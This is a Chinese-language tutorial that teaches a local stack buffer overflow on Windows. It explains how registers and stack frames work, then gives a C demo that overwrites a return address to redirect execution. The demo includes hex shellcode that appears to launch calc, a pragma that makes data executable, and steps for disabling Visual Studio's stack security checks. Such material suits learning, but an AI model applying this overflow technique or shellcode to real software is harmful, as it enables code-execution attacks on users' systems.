通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一)

在阅读此篇文章时,请先确定已有一些计算机功底,其中包括计算机组成原理、寄存器功能、汇编语感。

正文开始:

实验环境:windows8.1,vs2010

相信不少人听说过缓冲区溢出攻击,这是当时黑客网络攻击很关键的一种攻击方式,直到现在很多黑客找到bug后进行的攻击行为还是基于它为原理,今天我给大家简单实验一下。

首先讲一下缓冲区溢出攻击如何实现,就要提到计算机底层调用函数的方式。当你运行你自己写好的程序时,系统会自动开一个线程并为你分配一段内存以供程序运行,其中一部分内存会用来作为线程的栈,而函数的调用离不开栈的运用。

先讲一些寄存器esp(栈指针寄存器)ebp(基址寄存器)eip(指令地址寄存器)eax(指令寄存器,可能还有其它功能)。

寄存器中都存放了一个32位的二进制数(如果是64位操作系统则是64位二进制数,不过用c或者汇编写的程序大多是三十二位的),这32位二进制数当然是一个地址,如果这个数是0x00000018(十六进制数)那么则该寄存器指向内存中第十八个字节(当然0x00000018这样的内存是不可能被普通程序员使用的,大多是0x007FEF87这样的内存)。

esp中存放的数据(三十二位二进制数)自然就是栈中的栈顶指针,比如栈的内存块是0x00000000~0x000000FF,而其中0x000000CC~0x000000FF(这些地址都是随便一写)有数据,则esp的地址就是0x000000CC-4=0x000000C8这个数,下一次压栈时,就会把0x000000C8~0x000000CB填满数据,栈顶指针再自减4,指向0x000000C4(栈的走向是从高地址走向低地址)。

ebp中存放的数据是用来基址寻址的基址(好别扭),也是一个地址,它的特点是一般会在局部变量和函数参数所存放地址的中间,意思就是ebp+0xXX中存放的数据是函数参数,ebp-0xXX中存放的数据是局部变量,当调用一个函数时,需要改变ebp中存放的地址。每一个函数都有自己的基址(应该吧)。

eip中存放的数据是下一条指令的地址,当cpu执行完当前指令需要下一条指令时,则会根据eip的数据(就是一条地址)来获取下一条指令,并把它存放到eax寄存器中。

函数调用过程:

当你在main函数里调用一个函数(比如fun函数)时

fun(a,b);

int i = 0;

这是两条指令,调用的函数有两个参数a、b,那么会先从右到左把b和a依次压入堆栈中,之后把下一条指令(int i = 0;)的地址也压入堆栈中(每压入一次esp自动自减4),当函数执行完后可根据该地址返回到父函数。

把ebp(此时ebp还是父函数的基址)的数据压入栈,函数执行完后根据该地址找回父函数基址。

把esp的地址值赋给ebp(此时ebp即为该函数基址)。

esp自减0xXX为局部变量开辟内存空间。

此时函数调用前的准备工作完成,开始函数调用。

此时栈的部分结构就是

__________

esp->||低地址

||

|缓冲区|

||

||

|_________|

|___ebp___|

|int i = 0;___|(父函数调用函数时的下一条指令地址)

|a________|

|b________|//高地址

………………(手工绘图 如果觉得图渣 那你来打我呀)

讲了这么多终于要讲到关键的地方了,如果我在函数中创建了一个局部变量数组char buffer[4],那么缓冲区最后的四个字节会被分给该局部变量,随后紧跟的内存存放的是ebp、父函数下一条指令地址(简称为返回地址)、函数参数a、b

如果此时我给buffer调用memcpy函数赋给了它十六个字节的字符串"0000111122223333",那么只有0000会被buffer接收,而ebp会被冲刷成1111(也就是0x31313131),返回地址会被冲刷为0x32323232,随后程序就崩溃了,因为函数调用结束后0x32323232是不可访问内存,会发生访问冲突。

如果我对十六个字节的字符串进行修改 把2222换成另一个函数的地址,在该函数调用完成后岂不是就会开始调用这个函数?这就是很前一段时间常见的缓冲区溢出攻击,会让程序开始执行一段secret代码,如果是恶意代码的话(嘿嘿嘿嘿嘿嘿)。

现在开始上代码(终于有代码了):

#include

#include

#include

#pragma comment(linker,"/SECTION:.data,RWE") //这条代码让shellcode数据片可作为代码来执行

unsigned char shellcode[] = "\x55\x64\x8b\x35\x30\x00\x00\x00"

"\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"

"\x08\x8b\x7e\x20\x8b\x36\x80\x7f"

"\x18\x00\x75\xf2\x8b\xfd\x83\xec"

"\x64\x8b\xec\x8b\x47\x3c\x8b\x54"

"\x07\x78\x03\xd7\x8b\x4a\x18\x8b"

"\x5a\x20\x03\xdf\x49\x8b\x34\x8b"

"\x03\xf7\xb8\x47\x65\x74\x50\x39"

"\x06\x75\xf1\xb8\x72\x6f\x63\x41"

"\x39\x46\x04\x75\xe7\x8b\x5a\x24"

"\x03\xdf\x66\x8b\x0c\x4b\x8b\x5a"

"\x1c\x03\xdf\x8b\x04\x8b\x03\xc7"

"\x89\x45\x4c\x6a\x00\x68\x61\x72"

"\x79\x41\x68\x4c\x69\x62\x72\x68"

"\x4c\x6f\x61\x64\x54\x57\xff\x55"

"\x4c\x89\x45\x50\x6a\x00\x68\x65"

"\x73\x73\x00\x68\x50\x72\x6f\x63"

"\x68\x45\x78\x69\x74\x54\x57\xff"

"\x55\x4c\x89\x45\x54\x6a\x70\x68"

"\x53\x6c\x65\x65\x54\x57\xff\x55"

"\x4c\x89\x45\x58\x6a\x00\x68\x72"

"\x74\x00\x00\x68\x6d\x73\x76\x63"

"\x54\xff\x55\x50\x8b\xf8\x6a\x00"

"\x68\x65\x6d\x00\x00\x68\x73\x79"

"\x73\x74\x54\x57\xff\x55\x4c\x89"

"\x45\x5c\x6a\x00\x68\x63\x61\x6c"

"\x63\x54\xff\x55\x5c\xff\x55\x54"

"";

void hacker()

{

printf("%i",1);//当该函数被调用时,说明溢出攻击成功了

exit(5);

}

void fun(char *str)

{

char buffer[4];

memcpy(buffer, str, 16);

}

int main()

{

//((void(*)())&shellcode)();//执行shellcode数据片

char badStr[] = "000011112222333344445555";//创建了一个24个字节的字符数组

DWORD *pEIP = (DWORD*)&badStr[8];//获取该数组的第八个元素的地址(从第零个开始)

//*pEIP = (DWORD)&shellcode[0];//获取shellcode数据片开头地址

*pEIP = (DWORD)hacker;//获取hacker函数地址(三十二位二进制数),同时赋给pEIP(即修改了badStr的2222变为hacker函数地址)

fun(badStr);//开始攻击

return 0;

}

看注释应该就能明白了,我在这里特别说一下vs很早就有检测栈溢出的功能了,不关闭它的话无法测试成功。

通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一)_第1张图片

选择console1属性

通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一)_第2张图片

修改基本运行时检查为默认值 修改缓冲区安全检查为否。

运行程序,发现log窗口中出现   ”程序“[0x202C] console1.exe: 本机”已退出,返回值为 5 (0x5)。“

说明执行了exit(5)代码,攻击成功。

下一章将讲述如何编写shellcode代码

你可能感兴趣的:(通用shellcode的编写、调用 实验缓冲区溢出攻击(非远程)调用shellcode实例(一))